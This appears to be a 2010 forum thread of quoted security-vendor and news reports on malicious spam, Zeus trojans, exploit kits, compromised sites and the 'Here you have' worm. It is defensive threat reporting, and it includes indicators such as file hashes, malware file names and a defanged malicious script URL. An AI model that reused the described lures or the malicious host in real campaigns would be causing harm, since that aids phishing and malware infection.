22 Jun 2010 - "Websense... has detected a malicious spam outbreak with the Subject line "Account Verification". As of June 22, we have counted more than 100,000 of these messages. The attack message is disguised as coming from Digg.com. It asks the recipient to verify their Digg.com account. Clicking the "Password change" link in the email body redirects the user to malicious websites... There are two malicious links in the payload. The first link redirects the user to a site that prompts the user to download a Trojan file (29% detection)*. The second link (in an iframe) redirects the user to a site laden with exploits..."
* http://www.virustotal.com/analisis/708890738629739b7a03eec09a468cbb80bdff09d982ff936b5af79d55e0c061-1277203516
File D38C95FD009D21A46235010C3C9F0A00DCC1E9F6.exe received on 2010.06.22 10:45:16 (UTC)
Result: 12/41 (29.27%)

(Screenshot available at the Websense URL above.)


2010-06-24, 14:22

Targeted attacks with Excel files
- http://www.f-secure.com/weblog/archives/00001975.html
June 24, 2010 - "... fresh set of attacks done with XLS files... This is some sort of personnel list. Like the other examples here, it drops and runs a backdoor when viewed... An apparent agenda... a list of organizations... A budget file... FIFA World Cup 2010 match schedule... The exploit in these files targets Excel Pointer Offset Memory Corruption Vulnerability CVE-2009-3129*. As you can see, such attack files can look like perfectly normal and credible document files..."
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3129
CVSS v2 Base Score: 9.3 (HIGH)

(Screenshots available at the F-secure URL above.)


2010-07-01, 22:04

DEP & ASLR ignored...
- http://krebsonsecurity.com/2010/07/top-apps-largely-forgo-windows-security-protections/
July 1st, 2010 - "... Attackers usually craft software exploits so that they write data or programs to very specific, static sections in the operating system’s memory. To counter this, Microsoft introduced with Windows Vista (and Windows 7) a feature called address space layout randomization or ASLR, which constantly moves these memory points to different positions. Another defensive feature called data execution prevention (DEP) — first introduced with Windows XP SP2 back in 2004 — attempts to make it so that even if an attacker succeeds in guessing the location of the memory point they’re seeking, the code placed there will not execute or run... Secunia found that at least 50 percent of the applications examined — including Apple Quicktime, Foxit Reader, Google Picasa, Java, OpenOffice.org, RealPlayer, VideoLAN VLC Player, and AOL‘s Winamp — still do not invoke either DEP or ASLR. Secunia said DEP adoption has been slow and uneven between operating system versions, and that ASLR support is improperly implemented by nearly all vendors..."

- http://www.theregister.co.uk/2010/07/02/win_app_security_defences/
2 July 2010

- http://secunia.com/gfx/pdf/DEP_ASLR_2010_paper.pdf
June 29, 2010


2010-07-03, 22:04

Malware SPAM... Paypal fraud
- http://techblog.avira.com/2010/07/03/malware-outbreak-paypal-security-warning/en/
July 3, 2010 - "There is a new wave of emails pretending to come from Paypal having a ZIP archive attached. The email claims that your Paypal account has been accessed by a third party and, in order to protect your account, the Paypal account has been locked. The user is invited to review the report attached to the email, a ZIP archive, containing a single executable file a naming scheme like account-<number>-report.exe. There is no link inside the email, so everything is “easy to use”: the recipient of the mail needs just to extract the file and execute it... DON'T DO THAT as the ZIP archive contains a malware detected by all Avira products as dropper DR/Delphi.Gen."

- http://isc.sans.edu/diary.html?storyid=9118
Last Updated: 2010-07-03 22:35:44 UTC - "... 'Delivery Status Notification Failure'... Trojan.bredo... now using NDR and Failure reports to attempt to further their malicious activity."


2010-07-12, 12:46

SPAM with malware increases - botnet recruiting...
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=225702834
July 9, 2010 - "... According to Symantec*, spammers appear to be "trying to make up for the loss of several zombie networks, due to legal actions." In other words, they're pumping out spam with malware in an attempt to build their botnets back up to full strength, adding as many compromised - aka zombie - PCs as they can... attackers have also been creating more phishing websites that spoof Google's social networking site Orkut, especially in Brazilian Portuguese, since Orkut's biggest traction is in Brazil, said Symantec... This attention to detail may result from the need to trick the maximum number of people during the short window that a phishing site remains active - just 54 hours, according to Symantec - before it gets shut down."
* http://www.symantec.com/connect/blogs/spam-and-phishing-landscape-july-2010


2010-07-12, 21:33

DynDNS - malware sites
- http://sunbeltblog.blogspot.com/2010/07/dyndns-hosts-malware-sites.html
July 12, 2010 - "Over the past month or so we've seen quite a lot of malware coming from sub-domains of DynDNS .com, which is a dynamic DNS provider... The sub-domains are changing every (few) hours, though the folder and file name generally do not. The sub-domains, which appear to be semi-randomly named, usually resolve to this IP:
The files coming down are typically detected as Trojan.Win32.Alureon, Trojan-Downloader.Win32.FraudLoad, and Trojan.Win32.FakeAlert — although detection among major antivirus providers is spotty and varies wildly by file...
Bottom line: any company that makes available services allowing anonymous users to post or distribute content/files for free will become a preferred means for distributing malware. These services have a responsibility to police the use of their free services."

(More detail available at the Sunbelt URL above.)


2010-07-14, 00:12

More malicious ZBot SPAM...
- http://www.sophos.com/blogs/gc/g/2010/07/13/malicious-payment-request-from-email-attack-strikes-inboxes/
July 13, 2010 - "... Malicious hackers have spammed out the latest incarnation of a campaign designed to compromise your computer - this time disguising their emails as though they were payment requests from eBay. The emails have a blank message body, but have a file called form.html attached... Of course it's a sneaky piece of social engineering on the behalf of the hackers. Many people would be tempted to open the attachment to find out what on earth the email is about... And opening the attachment (which Sophos detects as Troj/JSRedir-BV) redirects your web browser to a recently compromised webpage on a legitimate site infected with Mal/Iframe-Q... Firstly, your browser is redirected to a spam-related website (for instance, a Canadian pharmacy store). This may make you believe that the attack is merely designed to advertise medications on behalf of the spammers... Furthermore, however, a malicious iFrame also downloads further malware from other third-party websites. This malware can obviously be changed at anytime, but we have seen versions of the ZBot family of malware be distributed in the attack... the emails don't have to pretend to be from eBay to be malicious. Recently we've seen other criminal email campaigns with dangerous html attachments involving Adult Friend Finder, romantic interest & Skype purchases, Facebook porn & Skype payment problems, and Facebook password resets amongst others."


2010-07-14, 18:45

Cyber fraud and banks ...
- http://krebsonsecurity.com/2010/07/the-case-for-cybersecurity-insurance-part-ii/
July 14, 2010 - "... When consumers lose money due to cyber fraud, retail banks are required by law to refund the money — provided the victim doesn’t wait too long in reporting the unauthorized charges. Commercial banks, however, are under no such obligation, although they usually will work with the victim customer to try to reverse as many of the fraudulent transfers as possible... the attackers also evaded procedural security measures the company put in place to ensure that two employees signed off on every transaction..."

Further reading: The Case for Cybersecurity Insurance, Part I
- http://krebsonsecurity.com/2010/06/the-case-for-cybersecurity-insurance-part-i/


2010-07-15, 15:58

SPAM via DHA on the increase...
- http://www.symantec.com/connect/blogs/spammers-harvesting-high-gear
July 15, 2010 - "... observed a dramatic increase in the directory harvest attack (DHA*) method. There was a staggering 15 times increase in DHA attacks during the first week of July 2010 when compared to the same period in June 2010. The spike was observed in the second week of June and is still rife. *So what exactly is a directory harvest attack? It is one of the methods spammers use to gather valid email addresses. One of the ways to generate email addresses to carry out this attack is by creating all possible alphanumeric combinations that could be used for the username part of an email address (up to a maximum length) and appending it to a domain. Alternatively, the dictionary attack method is used to generate email addresses, which is the preferred tactic of spammers... The list of valid email addresses collected by this attack method potentially improves the spammers’ deliverability and conversion rate by targeting a set of only valid email addresses. In addition, these valid email addresses can also be sold as email lists in the underground economy..."

- http://isc.sans.edu/diary.html?storyid=9175
Last Updated: 2010-07-15 15:18:33 UTC

It -will- take some time for SPAM blockers and AV to catch up with this...


2010-07-27, 16:06

Fake MS Advisory SPAM...
- http://blog.trendmicro.com/zeuszbot-and-sality-jump-on-the-lnk-exploit-bandwagon/
July 27, 2010 - "... exploits targeting the Windows shortcut zero-day vulnerability have risen in number. It is also now being used to spread ZBOT variants via malicious attachments to spammed messages... with the subject Microsoft Windows Security Advisory... the attached archive contains a malicious .LNK file that Trend Micro proactively detects as LNK_STUXNET.SM. Also included is a malicious .DLL file detected as TROJ_ZBOT.BXW. When the exploit code in the shortcut is triggered, it runs the malware component, which then downloads and executes the main malware, TROJ_ZBOT.BXW. TROJ_ZBOT.BXW is one of the ZBOT 2.0 variants that we spotted earlier this year, highlighting how widespread the vulnerability is now being exploited. SALITY file infectors are now using this vulnerability as well... malware using the LNK vulnerability can spread more easily than those that use the AUTORUN.INF file. Until a patch to resolve the vulnerability is released, even more malware families are likely to exploit it."


2010-08-01, 14:25

Fake jobs, fake checks...
- http://www.secureworks.com/research/threats/big-boss/
July 28, 2010 - "... In April 2010, during the course of an unrelated investigation, SecureWorks' Counter Threat Unit (CTU) discovered a unique variant of the well-known ZeuS trojan... Analysis of the sample revealed that in addition to the ordinary ZeuS functionality of stealing credentials, two new functions had been added:
1. The infected system listens on a random TCP port in order to serve as a SOCKS proxy
2. The infected system establishes a VPN (Virtual Private Network) connection to a remote server using the PPTP (Point-to-Point Tunneling Protocol) functionality built-in to Windows.
Although it is very common for trojans (especially ones designed to aid in financial fraud) to employ proxy server capability, this is the first time that the CTU has seen the use of VPN technology in such software... by employing the very simple VPN functionality built right in to Windows, the criminal bypasses the need to develop complex systems, and can simply route his/her malicious traffic over the VPN... some of the activity CTU observed traversing the proxy botnet at different times.
• Money mule job offer spam through multiple webmail services
• Scraping of job websites to obtain new email addresses to spam...
Essentially, the hackers are logging into online job sites and pulling email addresses of those looking for jobs... criminals have developed sophisticated malware that can intercept and alter transactions in progress, even when two-factor authentication is in play. Antivirus engines are unlikely to catch these malicious programs until it is too late... it would be extremely beneficial if those signing up for a job site are required to read and understand about the different kinds of fraudulent job offers they might receive, what kinds of red flags they might see in a fraudulent offer, along with guidelines for checking out a prospective hirer's legitimacy. If all of these parties were able to block these kinds of abuses, the criminals would find it much more difficult to carry out an operation of this scale."

(More detail and screenshots at the Secureworks URL above.)

- http://www.theregister.co.uk/2010/07/28/automated_check_counterfeiting/
28 July 2010


2010-08-02, 13:15

Malware movies...
- http://blog.trendmicro.com/quicktime-player-allows-movie-files-to-trigger-malware-download/
July 30, 2010 - "... encountered two .MOV files (001 Dvdrip Salt.mov and salt dvdrpi [xtrancex].mov) that both used the recent movie Salt, starring Angelina Jolie. It looks suspicious enough because of its relatively small size compared with regular movie files. When the movie files are loaded to QuickTime, it doesn’t show any live action scenes but leads users to download malware pretending to be either an update codec or another player installation... According to Apple, the two .MOV files do not make use of an exploit, instead “they rely on social engineering to trick the user into downloading the malware disguised as a movie codec. This is -not- related to the vulnerability reported by Secunia*..."
* http://secunia.com/advisories/40729
Release Date: 2010-07-26
Criticality level: [b]Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
... The vulnerability is confirmed in version 7.6.6 (1671) for Windows..."

More "Salt":
- http://sunbeltblog.blogspot.com/2010/08/not-enough-salt-in-your-clickpotato.html
August 02, 2010


2010-08-03, 13:50

Web 2.0 undermines Enterprise Security...
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=226500076
Aug. 2, 2010 - "More than 80% of security administrators think that Web 2.0 applications - social networking tools, widgets, instant messaging programs, and their ilk - are undermining enterprise security. Furthermore, one in five think that employees rarely or never consider the consequences to corporate security of engaging in such activities as downloading applications from the Internet, streaming video, or using peer-to-peer file-sharing sites. Those results come from a new survey of more than 2,100 IT security administrators in the United States, United Kingdom, France, Japan, and Australia. The survey was conducted by the Ponemon Institute and sponsored by Check Point Software Technologies... The survey also found that nearly half of security managers think that minimizing Web 2.0 risks is an urgent priority. According to respondents, the top threats posed by Web 2.0 applications are, in order, poor workplace productivity, malware, data loss, and viruses..."


2010-08-05, 13:01

(More) tax-themed malicious emails
- http://community.websense.com/blogs/securitylabs/archive/2010/08/04/2010-Tax_2D00_Themed-Malicious-Emails.aspx
4 Aug 2010 - "Websense... has detected a wave of tax-themed malicious email. While the tax theme in spam email is common all year round, it is interesting to see the different strategies malicious authors use in their campaigns. We have seen reports last June about email with the subject "Notice of Underreported Income". Today, we have seen a couple of email having the same subject but with different attack strategies. The first sample below uses a malicious link just like those distributed earlier. Unlike earlier malicious email, which redirects to a fake IRS site that instructs the user to download a malicious file (tax-statement.exe), this link saves the victim a couple of clicks by prompting to download a file (adobe_flash_install.exe) immediately without going to a fake IRS site... The second sample below is more aggressive in that the malicious zip [MD5:dfbb95730b2377cccf8372107bdef503] is attached in the email. It is recognized by 1/42 AV engines via VirusTotal*... In addition to these, we are seeing malicious email with the subject “You are in a higher tax bracket”. It also has a malicious zip [MD5: 3b9c60c761734fcd4ac7a753c93ec5d1] attached to it and is recognized by 1/42 AV engines via VirusTotal*..."
* http://www.virustotal.com/analisis/2bd3d1e8924833d711951794c4eb6ae4d362246950bf33861cf6a2d44a937d85-1280939399
File tax_statement.zip received on 2010.08.04 16:29:59 (UTC)
Result: 1/42 (2.38%)


2010-08-06, 19:01

100+ sites compromised - Media Temple host svrs...
- http://community.websense.com/blogs/securitylabs/archive/2010/08/05/Media-Temple-injections-lead-to-Phoenix-Exploit-Kit.aspx
05 Aug 2010 - "Websense... has discovered that over 100 Web sites on the Media Temple Web host servers have been compromised, and will lead visitors to the Phoenix Exploit Kit. It's not the first time they have had a WordPress injection, but a quick investigation suggests that only 46% of these sites have WordPress installed, and Sucuri Scanner* reveals that they do have multiple vulnerabilities... According to the statement from Media Temple, neither Media Temple’s architecture nor the up-to-date versions of WordPress is the source of these compromises. Some insecure 3rd-party software applications installed on customer servers are the root cause, which has been verified by Sucuri... The Phoenix Exploit Kit** is a sophisticated hacker tool set that exploits several of the latest vulnerabilities on popular vectors to execute arbitrary code..."
* http://sucuri.net/?page=scan

** http://community.websense.com/resized-image.ashx/__size/550x0/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/7367.Capture.PNG

- http://weblog.mediatemple.net/weblog/2010/08/06/security-facts/#more-2365
updated 8/6/10 5:10 pm - Recent Attacks...

- http://www.m86security.com/labs/i/Phoenix-Exploit-Kit-2-0,trace.1427~.asp
m86security (Last Reviewed: August 3, 2010)


2010-08-07, 05:01

Rogue AV SPAM...
- http://community.websense.com/blogs/securitylabs/archive/2010/08/06/You-have-Rogue-Mail.aspx
06 Aug 2010 - "Websense... has detected thousands of malicious emails purporting to be from big-brand companies like Target, Macy’s, Best Buy, and Evite... All the malicious URLs associated in the emails above redirect to the same fake AV web site. Users are then prompted to run a malicious executable called "antivirus_24.exe" [MD5: 5be4b708a68687cb5490fe2caea49c82], currently detected by 11/42 AV engines*..."
* http://www.virustotal.com/analisis/5ff1f7a1d1ab4f32ca1defad5f76ba15a2ec2fe57559ddc9747aeceb19db98d6-1281107011
File antivirus_24.exe received on 2010.08.06 15:03:31 (UTC)
Result: 11/41 (26.83%)

- http://ddanchev.blogspot.com/2010/08/spamvertised-best-buy-macys-evite-and.html
August 09, 2010


2010-08-13, 23:24

Red Cross site(s) hacked...
- http://www.esecurityplanet.com/features/print.php/3898516
August 13, 2010 - "Zscaler this week uncovered a new malware scam targeting the Red Cross of Serbia, the second time in five months that hackers have zeroed in on one of the international humanitarian organization's public websites. Hackers managed to inject a malicious JavaScript file, "hxxp ://obsurewax.ru/Kbps .js" into several pages on the Red Cross of Serbia's homepage. Most antivirus software programs now prevent Internet users from accessing the site, but before being caught, the malware could have infected users' machines to capture personal information and spread even more malware and spam... Back in March, the American Red Cross East Shoreline Chapter's website* was hit by a malware campaign that used iframe injections to infect several pages with malicious code and links. Zscaler said it has already notified the Red Cross of Serbia of this latest cyber attack. The assault marks only the latest victory for cyber criminals as they launch ever more numerous efforts to penetrate users' systems and steal critical data..."
* http://research.zscaler.com/2010/03/redcross-site-hacked.html


2010-08-27, 17:42

Obfuscated links in emails using JavaScript
- http://techblog.avira.com/2010/08/27/obfuscated-links-in-emails-using-javascript/en/
August 27, 2010 - "Our spam traps started to receive a bunch of Phishing emails... having no link inside. We know many tricks how to hide the URL (JavaScript, form, etc.) but this one was new: Pretending to be an invoice in HTML format, the attached HTML document displays the same content as in the mail body and immediately redirects to the fake website... The email looks quite usual for spam or Phishing on first sight, but the interesting part comes after analysing the attached HTML document. The document contains, inside the row of a table, a piece of obfuscated JavaScript code. In simple terms, the JavaScript code uses the property of each document called “location” to redirect the web browser to the fake website. The first idea coming to mind is that almost no modern email client executes JavaScript when rendering an HTML document. However, even if the email client (Outlook, Windows Mail, Thunderbird, etc.) doesn’t execute the script, the web browsers does. As soon as the user opens the attachment with a double click, the web browser opens it an gets immediately redirected to the fake website. The website wasn’t available anymore when we started to analyze the emails."

(Screenshots available at the URL above.)


2010-08-31, 15:21

SPAM/malware fake delivery failure msgs
- http://tools.cisco.com/security/center/viewAlert.x?alertId=19743
Last: August 30, 2010 - "... significant activity related to spam e-mail messages that inform the recipient about the delivery failure of a United Parcel Service (UPS) shipment. The message instructs the recipient to print a label in the attached .zip file and collect the package from a UPS office. However, the attachment actually contains a malicious .exe file that, if executed, attempts to infect the user's system with malicious code...
Subject: UPS Delivery Problem RN 26489...
Subject: UPS INVOICE NR9030102...
Subject: Fedex Item Status N7185272..."

- http://labs.m86security.com/2010/08/fedex-spam-seeding-new-asprox-binary/


2010-09-03, 15:56

iTunes v10 - Ping SPAM...
- http://www.sophos.com/blogs/chetw/g/2010/09/02/apple-pingd-comment-spam-coming/
September 2nd, 2010 - "Apple launched iTunes 10 yesterday along with their updated hardware platforms. Aside from supporting the newest generation of iPod and Apple TV devices, this new version of iTunes also introduces a new social media service branded as Ping. If you use iTunes, you should definitely update to iTunes 10 as it fixes thirteen separate vulnerabilities... apparently Apple didn't consider this when designing Ping, as the service implements no spam or URL filtering. It is no big shock that less than 24 hours after launch, Ping is drowning in scams and spams."

- http://www.newsfactor.com/story.xhtml?story_id=003000C9B0YI
September 3, 2010 - "... Some Ping posts are attempting to trick users into believing they will receive a free iPhone if they complete online surveys. Sophos published research earlier this year demonstrating a 70 percent increase in the number of users reporting spam and malware being spread via social networks, a trend that continues to grow. It would appear that Apple missed that report..."


2010-09-07, 15:13

Survey SPAM on YouTube
- http://www.sophos.com/blogs/gc/g/2010/09/07/video-fan-scammer-survey-spam-youtube
September 7, 2010 - "... themes that has been coming through loud and clear in the security world for the last few months has been the use by scammers of revenue-generating surveys... mostly impacting Facebook users, where unsuspecting computer owners click on a link shared with them via the social networking site only to discover that they have to complete a survey before seeing some typically salacious content. The scammers, meanwhile, earn their crust by receiving a small commission for each survey that is completed. These survey scams, however, are not just limited to Facebook... It doesn't matter if you receive a message via Facebook, YouTube or traditional email - you should always be suspicious of unsolicited communications and think before you click."


2010-09-08, 16:15

Cybercrime strikes more than 2/3 of Internet Users
- http://www.symantec.com/about/news/release/article.jsp?prid=20100908_01
September 8, 2010 – "... You might be just one click away from becoming the next cybercrime victim. A new study released today from security software maker Norton reveals the staggering prevalence of cybercrime: Two-thirds (65 percent) of Internet users globally, and almost three-quarters (73 percent) of U.S. Web surfers have fallen victim to cybercrimes, including computer viruses, online credit card fraud and identity theft. As the most victimized nations, America ranks third, after China (83 percent) and Brazil and India (tie 76 percent). The Norton Cybercrime Report: The Human Impact* shines a light on the personal toll cybercrime takes... victims’ strongest reactions are feeling angry (58 percent), annoyed (51 percent) and cheated (40 percent), and in many cases, they blame themselves for being attacked. Only 3 percent don’t think it will happen to them, and nearly 80 percent do not expect cybercriminals to be brought to justice — resulting in an ironic reluctance to take action and a sense of helplessness... Despite the emotional burden, the universal threat, and incidents of cybercrime, people still aren’t changing their behaviors - with only half (51 percent) of adults saying they would change their behavior if they became a victim. Even scarier, fewer than half (44 percent) reported the crime to the police... According to the report, it takes an average of 28 days to resolve a cybercrime, and the average cost to resolve that crime is $334. Twenty-eight percent of respondents said the biggest hassle they faced when dealing with cybercrime was the time it took to solve..."
* http://cybercrime.newslinevine.com/

Cybercrime Map:
- http://i.i.com.com/cnwk.1d/i/tim//2010/09/07/SymantecCybercrimeMap.png


2010-09-10, 15:18

'Here you have...' SPAM/virus
- http://isc.sans.edu/diary.html?storyid=9529
Last Updated: 2010-09-09 21:49:06 UTC ...(Version: 2) - "We are aware of the "Here you have" malware that is spreading via email. As we find out more, we'll update this diary.
Update: 2010-09-09 21:28 UTC (JAC) There are several good writeups on the behavior of this malware see some of the references below. The spam contains a link to a document, the link looks like it is to a PDF, but is, in fact, to a .SCR file and served from a different domain from what the link appears to point to. The original file seems to have been removed, so further infections from the initial variant should not occur, but new variants may well follow. The .SCR when executed downloads a number of additional tools, one of which appears to attempt to check in with a potential controller. The name associated the controller has been sink-holed. The malware attempts to deactivate most anti-virus packages and uses the infected user's Outlook to send out its spam.
File name: PDF_Document21_025542010_pdf.scr
Submission date: 2010-09-09 18:52:15 (UTC)
Result: 13/43 (30.2%)

- http://sunbeltblog.blogspot.com/2010/09/here-you-have-worm.html
September 10, 2010 - "... The subject line on the email was “Here you have” or “Just For you”..."

- https://kc.mcafee.com/corporate/index?page=content&id=KB69857&actp=LIST
Last Modified: September 09, 2010 - "... confirmation that some customers have received large volumes of spam containing a link to malware, a mass-mailing worm identified as VBMania. The symptom reported thus far is that the spam volume is overwhelming the email infrastructure. Static URLs in the email link to a .SCR file. McAfee recommends that customers filter for the URL on gateway and email servers, and block the creation of .SCR files on endpoint systems..."

- http://www.symantec.com/connect/blogs/handling-internal-mail-storms-reply-all-and-here-you-have-virus
September 10, 2010 - "... the huge volume of traffic can actually take down servers...
1. Outbreak detection: Identify that an active outbreak is occurring because of the volume of traffic generated by the same malicious email
2. Internal mail filtering: Block all internal traffic of the "Here you Have" email* using Content Filtering
3. Mail store / inbox cleanup: Seek out and eliminate the "Here you Have" email from Mail Stores and end user inboxes..."
(Suggested add: "Just For you")

- http://www.symantec.com/connect/blogs/new-round-email-worm-here-you-have
September 9, 2010 - "... confirmed reports of a worm spreading through email under the subject "Here you have". The mail to the unsuspecting recipient claims to be providing a document available through a URL. The URL is spoofed and actually points to a malicious binary being hosted on a different server..."

- http://community.websense.com/blogs/securitylabs/archive/2010/09/10/quot-here-you-have-quot-email-campaign-malicious-SCR-mascarading-as-a-PDF.aspx
10 Sep 2010 - "... When the user clicks and follows the link, a malicious file is downloaded, which further spreads the email campaign by pillaging the user's Outlook address book. This makes the attack more convincing as the source of the email could be legitimate and trusted..."

- http://www.theregister.co.uk/2010/09/10/email_worm_spreading/
10 September 2010 - "... McAfee said multiple variants of the worm appear to be spreading, so it's not yet clear that the malicious screensaver is hosted by a single source."

- http://www.symantec.com/security_response/threatconlearn.jsp
9/10/2010 - "The ThreatCon is currently at Level 3: High. The ThreatCon has been raised to Level 3 due to increased activity. Symantec is observing a new threat spread through a socially engineered email attack. The email convinces the recipient to follow a link to open a malicious binary (disguised as a PDF)..."

- http://www.virustotal.com/file-scan/report.html?id=fedb7b404754cf85737fb7e50f33324b84eb4c0b98024c7d3302039a901b04b7-1284133892
File name: csrss.exe
Submission date: 2010-09-10 15:51:32 (UTC)
Result: 32 /43 (74.4%)

- http://blogs.technet.com/b/mmpc/archive/2010/09/10/update-on-the-here-you-have-worm-visal-b.aspx
10 Sep 2010 4:40 PM

- http://www.microsoft.com/security/portal/blog-images/visal-b.png
Charted - Sep. 10, 2010 18:59 GMT


2010-09-12, 00:30

“Here you have” worm linked...

- http://www.secureworks.com/research/threats/visal-b/
September 22, 2010 - "... Prevention:
In addition to network-based monitoring and detection, CTU recommends the following steps to help protect your organization from this and future threats.
• Avoid clicking links in email messages...
• Disable AutoRun...
• Limit user privileges...
• Secure WMI...
• Update host and gateway antivirus product signatures...
• Think twice before allowing your web browser to remember your passwords for you..."

- http://pandalabs.pandasecurity.com/here-you-have-worm-linked-to-electronic-jihadists/
Sep 10

- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=227400137
Sept. 10, 2010

- http://ddanchev.blogspot.com/2010/09/summarizing-3-years-of-research-into.html
September 11, 2010

- http://www.computerworld.com/s/article/9184818/Anti_US_hacker_takes_credit_for_Here_you_have_worm
September 12, 2010

- http://www.theregister.co.uk/2010/09/13/hacker_claims_credit_for_here_you_have_worm/
13 September 2010

- http://www.symantec.com/security_response/writeup.jsp?docid=2010-082013-3322-99&tabid=2


2010-09-12, 18:51

Flood of phishing sites...
- http://news.cnet.com/8301-27080_3-20016026-245.html
September 10, 2010 - "... Cybercriminals are cranking out fake Web sites branded as eBay, banks, and other financial companies to the tune of tens of thousands every week, according to new research. During a three-month study of its global malware database, Panda Security found on average 57,000 new Web sites created each week with the aim of exploiting a brand name in order to steal information that can be used to drain peoples' bank accounts. About 80 percent of those were phishing sites designed to trick people into entering their login credentials or other information on what they believed to be a legitimate bank or other Web site... America, PayPal, Internal Revenue Service, and Bendigo Bank (Australia). For the phishers, banks were obviously the most popular choice to mimic, at 65 percent of the total, followed by online stores and auction sites, investment funds and stockbrokers, government organizations and payment platforms..."
- http://i.i.com.com/cnwk.1d/i/tim//2010/09/09/PandaLabsFakeSites_610x347.png

Money-mule fakes...
- http://krebsonsecurity.com/2010/09/a-one-stop-money-mule-fraud-shop/
September 13th, 2010


2010-09-13, 19:03

More malware 4 U today...

- http://www.pcworld.com/article/205338/google_exec_instant_why_worry.html
13 Sep 2010 - "... gives SEOs more opportunities to apply their expertise than ever before..."

- http://www.symantec.com/connect/blogs/hydraq-aurora-attackers-back
13 Sep 2010 - "... we were quite certain that the gang behind Trojan.Hydraq hadn't gone away. It looks like they are back..."

- http://community.websense.com/blogs/securitylabs/archive/2010/09/13/malicious-pdf-challenges.aspx
13 Sep 2010 - "... PDF obfuscation that we have recently seen in a mass injection..."


2010-09-15, 14:02

Recent SPAM / fakes ...
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Threat Outbreak Alert: Fake Fax Notification E-mail Messages...
September 14, 2010
Threat Outbreak Alert: Fake Craigslist Ticket E-mail Messages...
September 14, 2010
Threat Outbreak Alert: Fake Online Poker Winner Notification E-mail Messages...
Updated! September 13, 2010
Threat Outbreak Alert: Fake Trojan Analysis E-mail Messages...
September 13, 2010
Threat Outbreak Alert: Fake Western Union Money Transfer Notification E-Mail Messages...
September 13, 2010
Threat Outbreak Alert: Fake iToken Update E-mail Messages...
Updated! September 11, 2010 ...

- http://sunbeltblog.blogspot.com/2010/09/letting-texas-holdem-chips-fall-where.html
September 15, 2010 - "... another Facebook scam... adware-infected games and job search help..."


2010-09-16, 11:11

Zeus malicious email msgs...
- http://community.websense.com/blogs/securitylabs/archive/2010/09/15/cash-quot-labels-and-such-quot-leads-to-zeus.aspx
15 Sep 2010 - "Websense... has detected another wave of Zeus malicious email messages. This campaign is related to the familiar "pharma" spam messages that we see everyday, with one exception. This campaign combines an HTML or ZIP attachment with a social engineering technique, similar to what we normally see in malicious email campaigns. For example, the message may state that $375 has been sent to a mail recipient's account, and include a link to view the transaction in the recipient's account. Opening the attachment results in a compromised user machine via an obfuscated JavaScript in the attached HTML file. So far, we have seen this type of email with subjects like "Labels and such" and "Greetings from Rivermark Bill Payer!"... In the case of an HTML attachment, criminals use obfuscated JavaScript. Content is encrypted with a commercially available HTML obfuscation tool... For email messages that have ZIP attachments, the ZIP file has coverage in VirusTotal - 5/43*. The "label.zip" file contains "label.exe" which is a copy of Zeus. The malware copies itself to "C:\Documents and Settings\user\Application Data\Ewca\refef.exe" and tries to access two sites located in the .ru zone..."
(There is a more up-to-date report (12/43) for this file.)
* http://www.virustotal.com/file-scan/report.html?id=419ccc9269f56ec812f116b6d6e7dc68dfaaed4cba9d9931b16a8f7516237303-1284603849
File name: e7023277449d3df3ed1af4ff757b1f7e
Submission date: 2010-09-16 02:24:09 (UTC)
Result: 12/43 (27.9%)

Zeus: http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci1431252,00.html
"... Because a Trojan built with a Zeus toolkit is so adaptable, variations of Zeus Trojans are often missed by anti-virus software applications. According to a report by security vendor Trusteer, 77% of the PCs infected with Zeus Trojans have up-to-date anti-virus software..."


2010-09-17, 12:27

Songlyrics.com compromised/injected...
- http://community.websense.com/blogs/securitylabs/archive/2010/09/16/let-s-sing-malicious-song.aspx
16 Sep 2010 - "... Websense... has detected that the popular site Songlyrics.com (with approximately 200,000 daily page views and 2,000,000 unique visitors) is compromised and injected with obfuscated malicious code... Once a user accesses the main page of the song lyrics site, injected code redirects to an exploit site loaded with the Crimepack exploit kit. Attempted exploits result in a malicious binary (VT 39.5%*) file that's run on the victim's computer. Once infected, the machine becomes another zombie-bot in the wild... It appears that the majority of pages served by Songlyrics.com are compromised..."
(Screenshots and more detail available at the Websense URL above.)

(There is a more up-to-date report (21/43) for this file.)
* http://www.virustotal.com/file-scan/report.html?id=53d61718464b6ff5b961aa2c86f0b9ba42820eed50e22636f4c4d1667391fb01-1284689796
File name: addeedd60b7be1fb234aceaf2eef824e
Submission date: 2010-09-17 02:16:36 (UTC)
Result: 21/43 (48.8%)

Facebook / Youtube - compromised webpages
- http://www.theinquirer.net/inquirer/news/1733750/facebook-701-compromised-webpages
Sep 17 2010- "... AVG is warning users of social notworking services to be on their guard after its research uncovered the 20,000 odd compromised pages, 11,701 of which are on the world's largest social network, Facebook. The insecurity outfit also found that Youtube has 7,163 compromised pages..."
- http://www.avg.com/us-en/press-releases-news.tpl-mcr7.ndi-232491


2010-09-22, 12:20

Cutwail SPAM cocktail
- http://labs.m86security.com/2010/09/cutwails-spam-cocktail/
September 21, 2010 - "... we have regularly observed spam campaigns where an HTML attachment contains obfuscated JavaScript redirect code. The Pushdo botnet’s spamming component, Cutwail, has been the culprit behind these types of malicious campaigns. Many different themes and subject lines have been used, such as the following:
America’s Got Talent
Apartment for rent
Shipping Notifications
Labels and such
Invoice for Floor Replacement
Delivery Status Notification (Failure)
Welcome Letter
NFL Picks Week 2
... and other random subjects including... one that uses celebrity names... The attached HTML source code is an obfuscated JavaScript... many variations... After de-obfuscating the JavaScript, we can see the payload which, depending on the sample, varies between redirecting to Fake AV landing pages, Canadian Pharmacy or to pages that host an exploit that attempts to install the Zeus Bot... At the same time, Cutwail is also emitting other malicious spam campaigns, but with ZIP attachments. Extracting the ZIP contains an executable no other than the Sasfis/Oficla Trojan. When we ran a sample, the Trojan was tasked to download a Fake AV downloader... Despite multiple attempts to take down Pushdo’s infrastructure, the gang behind this botnet are resilient... Pushdo’s spam volume has bounced back to levels similar to that before the takedown (representing about 10% of total spam), signifying that the gang’s business is back on track. So expect more malicious spam campaigns, exploits, and social engineering to come..."
(Screenshots available at the URL above.)

- http://blog.webroot.com/2010/09/22/malicious-html-mail-attachments-flood-inboxes/
September 22, 2010


2010-09-23, 19:43

